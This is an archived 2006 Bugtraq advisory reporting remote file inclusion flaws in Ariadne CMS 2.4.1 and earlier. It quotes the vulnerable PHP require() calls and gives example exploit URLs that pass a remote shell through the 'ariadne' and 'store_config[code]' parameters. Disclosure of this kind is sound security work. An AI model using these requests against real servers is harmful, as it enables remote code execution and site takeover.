| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 6 Nov 2006 18:30:51 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)
*******************************************************************************
# Title : Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities
# Author : ajann
# Script Page : http://www.ariadne-cms.org/en/download/
# Vuln;
*******************************************************************************
[Files]
loader.php
loader.cmd.php
[/Files]
[Code,1]
loader.php Error:
..
....
require($ariadne."/configs/ariadne.phtml");
require($ariadne."/configs/ftp/$configfile");
require($ariadne."/configs/store.phtml");
require($ariadne."/includes/loader.ftp.php");
require($ariadne."/configs/sessions.phtml");
require($ariadne."/stores/".$store_config["dbms"]."store.phtml");
require($ariadne."/nls/en");
require($ariadne."/modules/mod_mimemagic.php");
require($ariadne."/modules/mod_virusscan.php");
....
..
Key [:] ariadne=[file]
Key [:] store_config[code]=[file]
\Example:
http://target.com/path/ftp/loader.php?ariadne=Shell
http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell
....
# ajann,Turkey
# ...
# Im not Hacker!
Powered by blists - more mailing lists